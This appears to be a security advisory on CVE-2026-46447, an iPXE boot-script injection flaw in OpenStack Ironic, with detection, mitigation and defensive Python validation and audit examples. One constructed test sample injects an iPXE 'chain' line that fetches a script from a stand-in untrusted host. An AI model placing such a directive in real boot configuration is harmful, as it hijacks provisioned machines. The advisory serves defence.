CVE-2026-46447 Overview
CVE-2026-46447 is a boot script injection vulnerability in OpenStack Ironic, the bare-metal provisioning service for OpenStack clouds. The flaw exists in versions prior to 35.0.2 and allows an authenticated attacker to inject malicious iPXE script content if they can set node.driver_info or node.instance_info. The vulnerability is classified under CWE-669: Incorrect Resource Transfer Between Spheres. Successful exploitation enables manipulation of the bare-metal boot process, undermining the integrity of provisioned nodes.
Critical Impact
Attackers with privileged access to node configuration can inject arbitrary iPXE boot scripts, compromising the integrity of provisioned bare-metal hardware during boot.
Affected Products
- OpenStack Ironic versions before 35.0.2
- Deployments using iPXE boot with attacker-controllable node.driver_info
- Deployments using iPXE boot with attacker-controllable node.instance_info
Discovery Timeline
- 2026-06-03 - CVE-2026-46447 published to NVD
- 2026-06-04 - Last updated in NVD database
Technical Details for CVE-2026-46447
Vulnerability Analysis
OpenStack Ironic provisions bare-metal nodes by generating iPXE scripts that direct each node to download a kernel, ramdisk, and supporting configuration. The script content is composed from fields stored on the node object, including driver_info and instance_info. Before version 35.0.2, Ironic did not adequately constrain values from these fields when they were rendered into the iPXE script.
An attacker with permission to write to node.driver_info or node.instance_info can place crafted content into one of these fields. When Ironic generates the iPXE boot script for that node, the injected content becomes part of the script executed by iPXE during boot. This crosses a trust boundary between API-level metadata and the firmware-stage boot process, which matches the CWE-669 resource-transfer pattern.
The attack requires high privileges and is of high complexity, but its scope is rated as changed because the injected script controls components outside Ironic itself, including the kernel and ramdisk loaded onto the bare-metal host.
Root Cause
The root cause is insufficient validation and sanitization of node metadata fields used as input to iPXE script generation. Values from node.driver_info and node.instance_info were treated as trusted boot configuration rather than untrusted user input requiring escaping or allow-list validation.
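A field-level allow-list check of the kind this paragraph says was missing, written as an added example (it is not Ironic's code and not the upstream fix). The field names, the allowed URL schemes and the trusted image host are illustrative assumptions; the point is that a value is rejected as soon as it could alter the structure of the rendered boot script rather than being escaped after the fact.

```python
"""Allow-list validation of node metadata before it reaches an iPXE template.

Added example, not Ironic's code and not the upstream fix for CVE-2026-46447.
Field names, allowed schemes and the trusted host are illustrative assumptions.
"""
import re
from urllib.parse import urlparse

TRUSTED_IMAGE_HOSTS = {"ironic-http.internal.example"}   # assumption: operator-owned image server
ALLOWED_SCHEMES = {"http", "https", "tftp"}
URL_FIELDS = {"deploy_kernel", "deploy_ramdisk", "image_source"}   # rendered as iPXE fetch targets
CMDLINE_FIELDS = {"kernel_append_params"}                           # rendered onto the kernel line
# One kernel command-line token: key or key=value, no quotes, no iPXE-significant characters.
CMDLINE_TOKEN = re.compile(r"^[A-Za-z0-9_.\-]+(=[A-Za-z0-9_.,:/\-]*)?$")


class InvalidNodeField(ValueError):
    """Raised when a value could change the structure of the generated boot script."""


def validate_field(name, value):
    if not isinstance(value, str):
        raise InvalidNodeField(f"{name}: expected a string")
    # Control characters (newline, carriage return, NUL, ...) could terminate the current
    # iPXE directive and start a new one once substituted into the template.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise InvalidNodeField(f"{name}: control character in value")
    if name in URL_FIELDS:
        if any(c.isspace() for c in value):
            raise InvalidNodeField(f"{name}: whitespace would split the directive")
        url = urlparse(value)
        if url.scheme not in ALLOWED_SCHEMES or url.hostname not in TRUSTED_IMAGE_HOSTS:
            raise InvalidNodeField(f"{name}: URL not on the allow-list: {value!r}")
    elif name in CMDLINE_FIELDS:
        for token in value.split():
            if not CMDLINE_TOKEN.match(token):
                raise InvalidNodeField(f"{name}: disallowed kernel parameter token {token!r}")
    else:
        raise InvalidNodeField(f"{name}: field is not permitted to reach the boot template")
    return value


def validate_boot_fields(info):
    """Validate a driver_info/instance_info fragment; raise on the first offending field."""
    return {name: validate_field(name, value) for name, value in info.items()}


def is_acceptable(info):
    """Boolean wrapper for callers that prefer a verdict over an exception."""
    try:
        validate_boot_fields(info)
        return True
    except InvalidNodeField:
        return False
```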
Attack Vector
An authenticated user or compromised service account with rights to modify node attributes sets malicious content within driver_info or instance_info. When the target node is rebooted or re-provisioned, Ironic produces an iPXE script containing the injected directives. The bare-metal host then executes the attacker-influenced boot sequence, which can redirect it to fetch unauthorized images or alter kernel command-line parameters.
No verified public proof-of-concept code is available. See the OpenStack Security Advisory OSSA-2026-017 and the Launchpad bug report for technical details.
Detection Methods for CVE-2026-46447
Indicators of Compromise
- Unexpected iPXE directives such as chain, kernel, or initrd referencing external URLs in generated boot scripts.
- Modifications to node.driver_info or node.instance_info from accounts that do not normally provision nodes.
- Bare-metal nodes booting from kernel or ramdisk images not present in the approved Glance image catalog.
Detection Strategies
- Audit Ironic API logs for PATCH and PUT requests targeting node objects, focusing on changes to driver_info and instance_info keys.
- Compare rendered iPXE scripts in the TFTP/HTTP boot directory against a known-good template and flag any embedded newlines or unexpected commands.
- Correlate node provisioning events with the identity of the requester and the source IP from Keystone authentication logs.
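The template-comparison strategy above, and the template-versus-rendered alerting recommended under Monitoring, as an added example that is not Ironic's code: a rendered script is checked line by line against a constructed, simplified stand-in for Ironic's template, and the audit flags extra lines, lines that deviate from the template structure, and fetch URLs whose host lies outside an assumed trusted set.

```python
"""Audit a rendered iPXE script against its known-good template.

Added example, not Ironic's code. TEMPLATE is a constructed, simplified stand-in
for Ironic's real template; TRUSTED_BOOT_HOSTS is an operator assumption.
"""
import re
from urllib.parse import urlparse

TRUSTED_BOOT_HOSTS = {"ironic-http.internal.example"}   # assumption: where kernels/ramdisks live
ALLOWED_SCHEMES = {"http", "https", "tftp"}
TEMPLATE = """#!ipxe
kernel {kernel_url} {kernel_params}
initrd {ramdisk_url}
boot"""                                                  # {name} = value filled from node metadata


def _placeholder(match):
    # A URL field may not contain whitespace and no field may span a line break,
    # so an injected directive cannot hide inside a legitimate placeholder.
    name = match.group(1)
    return f"(?P<{name}>\\S+)" if name.endswith("_url") else f"(?P<{name}>[^\\r\\n]+)"


def line_pattern(template_line):
    # re.escape makes the literal text exact ("{" becomes "\{"); placeholders become named groups.
    return re.compile(re.sub(r"\\\{(\w+)\\\}", _placeholder, re.escape(template_line)))


def audit_rendered_script(rendered, template=TEMPLATE):
    """Return a list of findings; an empty list means the rendering matches the template exactly."""
    findings, t_lines, r_lines = [], template.splitlines(), rendered.splitlines()
    for i, r_line in enumerate(r_lines, start=1):
        if i > len(t_lines):
            findings.append(f"line {i}: extra directive not in template: {r_line!r}")
            continue
        m = line_pattern(t_lines[i - 1]).fullmatch(r_line)
        if m is None:
            findings.append(f"line {i}: deviates from template: {r_line!r}")
            continue
        for name, value in m.groupdict().items():
            url = urlparse(value) if name.endswith("_url") else None
            if url and (url.scheme not in ALLOWED_SCHEMES or url.hostname not in TRUSTED_BOOT_HOSTS):
                findings.append(f"line {i}: {name} points outside the trusted hosts: {value!r}")
    if len(r_lines) < len(t_lines):
        findings.append("rendered script is shorter than the template")
    return findings


# Constructed samples: a clean rendering, and the same rendering with an extra chain line.
CLEAN = """#!ipxe
kernel http://ironic-http.internal.example/deploy/kernel ipa-api-url=http://ironic-api.internal.example:6385
initrd http://ironic-http.internal.example/deploy/ramdisk
boot"""
SUSPECT = CLEAN.replace("\ninitrd", "\nchain http://untrusted.example.invalid/stage.ipxe\ninitrd")
```

In a deployment the audit would run over every script in the TFTP/HTTP boot directory against the real template, with any non-empty finding list raised as an alert.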
Monitoring Recommendations
- Forward Ironic conductor and API logs to a centralized SIEM for retention and correlation with identity events.
- Alert on any deviation between the iPXE script template and the rendered output served to PXE clients.
- Track outbound HTTP requests from bare-metal nodes during boot to detect retrieval of unauthorized payloads.
How to Mitigate CVE-2026-46447
Immediate Actions Required
- Upgrade OpenStack Ironic to version 35.0.2 or later, which contains the fix for this vulnerability.
- Review and restrict Keystone role assignments that grant write access to node objects, especially driver_info and instance_info.
- Audit recent changes to node metadata for unexpected values referencing external URLs or shell-like syntax.
Patch Information
The OpenStack project addressed this issue in Ironic 35.0.2. Refer to the OpenStack Security Advisory OSSA-2026-017 and the upstream Openwall disclosure for version and patch references. Operators running stable branches should apply the corresponding backports published by the Ironic project.
Workarounds
- Limit API access so that only trusted operators can modify node.driver_info and node.instance_info until patches are applied.
- Use signed boot images and verify kernel and ramdisk checksums during provisioning workflows.
- Serve iPXE scripts over authenticated, integrity-protected channels and restrict the boot network to known node MAC addresses.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.